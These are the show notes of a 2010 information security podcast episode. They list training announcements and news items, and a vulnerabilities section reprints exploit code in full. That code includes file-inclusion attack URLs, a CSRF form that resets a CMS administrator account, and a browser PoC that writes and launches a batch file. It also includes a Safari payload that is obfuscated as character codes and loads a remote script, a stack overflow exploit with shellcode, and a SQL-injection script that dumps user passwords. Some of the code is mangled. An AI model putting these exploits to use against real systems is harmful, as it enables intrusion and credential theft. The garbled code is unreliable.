ISD Podcast Episode 97 for March 29, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
- Washington DC – April 12th to 16th
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July – 12th-16th
- Chicago – September – 13th – 17th
- Dallas, TX – October – 11th – 15th
- Washington DC – December 6th – 10th
- Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton
SANS Community Atlanta:
- SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Notacon 7
- April 15th – 18th, 2010 Cleveland, Ohio
- http://notacon.org/
- Adrian will be there presenting on Anti-Forensics
Kentuckiana Metasploit Class
- May 8, 2010 Jeffersonville, Indiana
- (No URL for that as of yet)
- Proceeds with be going to the Hackers for Charity Food For Work Program
Friends of the Podcast:
Webhosting services:WebSpeedway
Vulnerabilities of Interest:
-
- Pc4Uploader is subject to a Local File Include (LFI) vulnerability. Version 9.0 – 10.0 are impacted. Proof of Concept URL is available: http://www.sample.com/up/index.php?PHPSESSID=2e970d2361293815462ffaa028135c23;tempst=../../../../../../../../boot.ini%00
- AdaptCMS_Lite_1.5 is subject to change admin (user,passwd) & add new admin user vulnerability. Version 1.5 2009-07-07 is impacted. Exploit code is available:
<html>
<head>
<body>
<h2>coded by ahmadbady</h2>
<form action=’admin.php?view=edit_users2&id=1′ method=’post’>
<table cellpadding=’5′ cellspacing=’0′ border=’0′ width=’480′
style=’padding-left:5px’ align=’left’>
<tr><td>Username</td><td><input type=’text’
name=’username1′ size=’16′
value=’anything’
style=’font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px’>
</td></tr><tr><td>New
Password?</td><td><input type=’text’
name=’password1′ size=’16′
style=’font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px’>
</td></tr><tr><td>E-Mail</td><td><in
put type=’text’ name=’email1′
size=’16′ value=’anything’
style=’font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px’>
</td></tr><tr><td>Level</td><td><sel
ect name=’level’ style=’font-family:
tahoma;
font-size: 11px; border: 1px solid #444444;padding-left:1px’><option
value=’Admin’
selected>Admin – Level 1</option><option
value=’Member’>Member – Level
3</option>
<option value=’Staff’>Staff – Level
2</option></select></td></tr><tr><td>
<input type=’submit’ value=’Update User’
style=’font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px’>
</td>
</tr></table></form>
</td></tr></table>
</body>
</html> - 68kb is subject to multiple Remote File Include (RFI) vulnerabilities. Version 1.0.0rc2 is impacted. Example URL is available:
http://www.sample.com/themes/front/default/modules/show.php?file=shell.txt?
http://www.sample.com/themes/admin/default/modules/show.php?file=shell.txt?
- Netscape Navigator, Namoroka web browser and Flock browser are subject to a URL Code Execution vulnerability. Version 9.0.0.6 of Netscape Navigator is impacted. Exploit code is available:
<html>
<head>
<title>firelinking By eidelweiss</title><– Copyright (C) 2009-2010 firelinking by eidelweiss –>
<– Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u) , and all
my friends –>
<– This PoC is cross platform : On Windows this example creates the
file –>
<– c:\mampus.bat and launches it (opens a dos box with a dir command).
On –>
<– Linux (tested Fedora Core) the example creates the file –>
<– ~/mampus.txt Depending on caching the the script might –>
<– run twice in some cases (this will create an additional
mampus-1.txt). –><link rel=”SHORTCUT ICON” href=”favicon.ico”>
<script language=”JavaScript”
type=”text/javascript”>
var pf = navigator.platform.toLowerCase();
if (pf.indexOf(“win”) != -1) {
var os = “win”;
} else if (pf.indexOf(“linux”) != -1) {
var os = “linux”;
}
function GoFuck() {
// this is a bad caching workaround inside
document.getElementById(‘outhtml’).innerHTML = “”;
document.getElementById(‘outhtml’).innerHTML +=
document.getElementById(‘clearhtml’).value
document.getElementById(‘outhtml’).innerHTML +=
document.getElementById(‘clearhtml’).value
document.getElementById(‘outhtml’).innerHTML +=
document.getElementById(‘clearhtml’).value
window.setTimeout(“document.getElementById(‘outhtml’).innerHTML +=
document.getElementById(‘linkhtml_”+os+”‘).value”,300);
}
</script>
</head>
<body>
<div style=”font-family:Verdana;font-size:11px;”><div
style=”font-family:Verdana;font-size:15px;font-weight:bold;”>f
irelinking By eidelweiss</div>
<br><br>
<div style=”width:600px”>
<div
style=”display:none”></div><textarea style=”display:none”>
<link rel=”SHORTCUT ICON” href=”favicon.ico”>
</textarea><textarea id=”linkhtml_win”
style=”display:none”>
<link rel=”SHORTCUT ICON”
href=”view-source:javascript:delayedOpenWindow(‘
javascript:netscape.security.PrivilegeManager.enablePrivilege(\’UniversalXP
Connect\’);
file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Compo
nents.interfaces.
nsILocalFile);file.initWithPath(\’c:\\\\mampus.bat\’);file.createUnique(Com
ponents.interfaces.
nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.or
g/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputS
tream);
outputStream.init(file,0×04|0×08|0×20,420,0);output=\’@ECHO
OFF\\n:BEGIN\\nCLS\\nDIR\\n
PAUSE\\n:END\’;outputStream.write(output,output.length);outputStream.close(
);file.launch();’,”,”)”>
</textarea><textarea
style=”display:none”>
<link rel=”SHORTCUT ICON”
href=”view-source:javascript:delayedOpenWindow(‘javascript:
netscape.security.PrivilegeManager.enablePrivilege(\’UniversalXPConnect\’);
file=Components.
classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces
.nsILocalFile);file.
initWithPath(\’~/mampus.txt\’);file.createUnique(Components.interfaces.nsIF
ile.
NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/networ
k/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputS
tream);
outputStream.init(file,0×04|0×08|0×20,420,0);output=\’mampus!\’;outputStrea
m.write
(output,output.length);outputStream.close();’,”,”)”>
</textarea>
<br><br>
<a href=”#”>Run
exploit</a>
</div>
</body>
</html> - Apple Safari is subject to a history search vulnerability. Code Execution Exploit PoC is available:
<!–
Copyright (C) 2009-2010 firelinking by eidelweiss
Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u)
Credit: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , YOGYACARDERLINK
This P0C made for Educational Purpose only
Author Will Be not responsible For Any Damage.
–><html>
<script>
function Dick() {
window.open(‘safari:historysearch?q=%2A”><img src=\’Dick\’
Dickonerror=’evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,11
0,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73
,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,11
9,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104
,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,
59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,1
00,67,104,105,108,100,40,113,41,59))\’>&p=1&s=1′);
window.setTimeout(“location.href=’mailto:’”,6666);
}
</script>
<body scrolling=”no”>
<a href=”#”>Suck
Please…</a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<<img src=\’Dick\’
Dickonerror=’evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,11
0,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73
,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,11
9,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104
,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,
59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,1
00,67,104,105,108,100,40,113,41,59))’>
</body>
</html> - Open Web Analytics is subject to multiple file include vulnerabilities. Version 1.2.3 is impacted. Code PoC URL is available: http://www.sample.com/mw_plugin.php?IP=shell.txt?
- MyOWNspace is subject to multiple file include vulnerabilities. Version 8.2 is impacted. Example URLs are available: http://www.sample.com/graph.php?go=../../../../../../../boot.ini%00
http://www.sample.com/myowngraph.php?go=../../../../../../../boot.ini%00
http://www.sample.com/showmyownfriends.php?go=../../../../../../../boot.ini%00
- DaFun Spirit is subject to a Remote File Inclusion (RFI) vulnerability. Version 2.2.5 is impacted. Example URLs are available: http://www.sample.com/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]
http://www.sample.com/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]
- Mini-Stream Ripper is subject to a local stack buffer overflow vulnerability. Version 3.1.0.8 is impacted. Exploit code is available:
# Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
# Author: Hazem Mofeed
# Download: http://www.mini-stream.net/mini-stream-ripper/download/
# Home: http://hakxer.wordpress.com# [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] –> Exploited ..
# http://www.exploit-db.com/exploits/11607
shellcode = (“xebx16x5bx31xc0x50x53xbbx0dx25x86x7cxffxd3x31xc0″
“x50xbbx12xcbx81x7cxffxd3xe8xe5xffxffxffx63x61x6c”
“x63x2ex65x78x65x00″) # SP3(sh)# exploit
exploit = (“x41″ * 43496 + “x08x6Ax83x7C” +
“x08x6Ax83x7C” + shellcode )
file = open(“exploit.smi”,”w”)
file.write(exploit)
file.close() - SiteX CMS is subject to a SQL injection vulnerability. Version 0.7.4 Beta is impacted. Exploit code is available:
<?php
echo
“nn###########################################################################n”;
echo “####n”;
echo “## Product: SiteX CMS 0.7.4 beta (/photo.php) SQL-Injectionexploit ##n”;
echo “## Usage: php.exe sitex.php www.site.com /cmspath/##n”;
echo “## Require: Magic_quotes = off##n”;
echo “## Author: Sc0rpi0n [RUS] (http://scorpion.su)##n”;
echo “## Special for Antichat (forum.antichat.ru)##n”;
echo “## Bugs find: Iceangel_, [x60]unu, .:[melkiy]:.##n”;
echo “####n”;
echo
“###########################################################################nn”;
$host=$argv[1];
$path=$argv[2];
$script=”photo.php?albumid=”;
$sql=urlencode(“-1′ UNION SELECT
1,concat(0x3a3a,username,0x3a3a3a,password,0x3a3a3a3a),3,4,5,6,7,8 FROM
SiteX_Users WHERE — “);
$fsock=fsockopen($host,80);
$headers=”GET http://$host$path$script$sql HTTP/1.0rn”;
$headers.=”Host: $hostrnrn”;
fwrite($fsock,$headers);
while(!feof($fsock))
$response.=fread($fsock,1024);
$pos1=strpos($response,”::”) or die(“## http://$host is not
vulnerable or errorn”);
$pos2=strpos($response,”:::”) or die(“## http://$host is not
vulnerable or errorn”);
$pos3=strpos($response,”::::”) or die(“## http://$host is
not vulnerable or errorn”);
$len1=$pos2-$pos1;
$len2=$pos3-$pos2;$login=substr($response,$pos1+2,$len1-2);
$password=substr($response,$pos2+3,$len2-3);echo “## Host: $argv[1]n”;
echo “## Login: $loginn”;
echo “## Password: $passwordn”;
?>
Stories of Interest:
News item 1: http://www.computerworld.com/s/article/9173965/FBI_lists_Top_10_posts_in_cybercriminal_operations?taxonomyId=17
Criminal hacker organizations are operating with increasing corporate-life efficiency, specialization and expertise, according to the FBI.
From a business perspective, these criminal enterprises are highly productive and staffed by dedicated people willing to operate worldwide, around the clock “without holidays, weekends or vacations,” according to
Steven Chabinsky, deputy assistant director in the FBI’s cyber division. “As a result, when an opportunity presents itself these criminals can start planning within hours.”
According to the FBI the top 10 positions in cyber criminal organizations are:
1. Coders/programmers, who write the exploits and malware used by the criminal enterprise. Contrary to popular belief, Chabinsky noted that coders who knowingly take part in a criminal enterprise are not protected by the First Amendment.
2. Distributors, who trade and sell stolen data and act as vouchers for the goods provided by other specialists.
3. Tech experts, who maintain the criminal enterprise’s IT infrastructure, including servers, encryption technologies, databases, and the like.
4. Hackers, who search for and exploit applications, systems and network vulnerabilities.
5. Fraudsters, who create and deploy various social engineering schemes, such as phishing and spam.
6. Hosted systems providers, who offer safe hosting of illicit content servers and sites.
7. Cashiers, who control drop accounts and provide names and accounts to other criminals for a fee.
8. Money mules, who complete wire transfers between bank accounts. The money mules may use student and work visas to travel to the U.S. to open bank accounts.
9. Tellers, who are charged with transferring and laundering illicitly gained proceeds through digital currency services and different world currencies.
10. Organization Leaders, often “people persons” without technical skills. The leaders assemble the team and choose the targets.
News item 2:http://www.computerworld.com/s/article/9174242/Military_warns_of_increasingly_active_cyber_threat_from_China_
On the same day that Google Inc. and the GoDaddy Group Inc. complained about China to a congressional committee, U.S. Navy Admiral Robert Willard appeared before the U.S. House Armed Services Committee with an even stronger warning about cyber-threats posed by China.
Willard’s comments about China received little press attention but were stronger than anything said by either company.
“U.S. military and government networks and computer systems continue to be the target of intrusions that appear to have originated from within the PRC (People’s Republic of China),” said Willard.
He said that most of the intrusions are focused on acquiring data “but the skills being demonstrated would also apply to network attacks.”
Willard testified on the military’s operations in its Pacific command, which he said “faces increasingly active and sophisticated threats to our information and computer infrastructure.”
News item 3: http://www.telegraph.co.uk/news/newstopics/howaboutthat/7532996/Ageing-spies-unable-to-use-the-internet.html
The Security Service is launching an unprecedented round of redundancies to improve the overall level of computer skills among its staff.
Despite an expanding budget, MI5 is laying off employees in order to hire new intelligence officers and support staff with better command of information technology and other “deployable” skills.
The redundancy programme has set tongues wagging in Whitehall, with civil servants in other departments joking about a “James Bond generation” of elderly spies being put out to pasture because they can’t use the internet and don’t understand the world of Twitter or Facebook.
The plan was disclosed by Jonathan Evans, the director-general of MI5. He told a Parliamentary committee that he is concerned that his agency’s overall IT skills are not up to scratch, leading him to get rid of some employees.
News item 4:http://www.kptv.com/news/22964989/detail.html
The theft of a computer from Molalla’s water treatment facility is being considered a federal crime by authorities. Someone broke into the water plant Saturday night and stole the computer, which was what kept the plant working on auto pilot. Water service to Molalla has not been affected, but workers must operate the plant the old-fashioned way.
“It has to be manually run and also inspected (so) visual checks can be made,” said Marc Howatt, the city’s public works director.
The thieves broke into the water plant through a back window. Once inside, Howatt said, the thief triggered a motion detector and an on-call manager rushed to the facility and found the front door open and one of the computers gone.
The computer contained software that monitored the water pumps, reservoir and chlorine levels.”The software enables ease of operation,” Howatt said. “It allows the operator to log onto a screen and see what’s happening with the plant at any given time during the day.” The following day, workers found the computer in a pond on the property. City officials said it’s destroyed, but a technician is trying to salvage the hard drive and the costly programming on it.
